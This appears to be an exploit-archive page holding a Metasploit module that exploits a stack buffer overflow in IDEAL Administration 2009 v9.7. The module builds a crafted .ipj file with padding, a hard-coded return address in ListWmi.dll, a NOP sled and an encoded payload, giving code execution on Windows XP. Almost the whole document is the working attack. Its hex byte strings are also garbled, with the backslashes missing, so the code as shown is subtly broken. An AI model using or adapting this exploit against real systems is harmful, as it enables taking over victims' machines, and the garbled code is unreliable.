[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IDEAL Administration 2009 v9.7 Buffer Overflow - MSF Universal
# Published : 2009-12-06
# Author : dookie
# Previous Title : gAlan 0.2.1 Universal Buffer Overflow Exploit (meta)
# Next Title : IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IDEAL Administration 2009 Buffer Overflow - Universal',
			'Description'    => %q{
					This module exploits a stack overflow in IDEAL Administration v9.7.
					By creating a specially crafted ipj file, an an attacker may be able
					to execute arbitrary code. 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'dookie, original by Dr_IDE' ],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},					
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "x00x3cx22x3ex1ax0a",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Windows XP Universal', { 'Ret' => 0x10010F2E } ], # ListWmi.dll
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 05 2009',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME',   [ false, 'The file name.',  'unIDEAL.ipj']),
				], self.class)

	end

	def exploit

		sploit =  "x0Dx0Ax5Bx47x72x6Fx75x70x2Cx45x78x70x6F"
		sploit << "x72x74x2Cx59x65x73x5Dx0Dx0A"
		sploit << "x43x6fx6dx70x75x74x65x72x3D"
		sploit << rand_text_alpha_upper(2420)
		sploit << [target.ret].pack('V')
		sploit << "x90" * 300
		sploit << payload.encoded
		sploit << "x0Dx0Ax5Bx45x6Ex64x5Dx0Dx0A"
	
		ipj = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(ipj)   

	end

end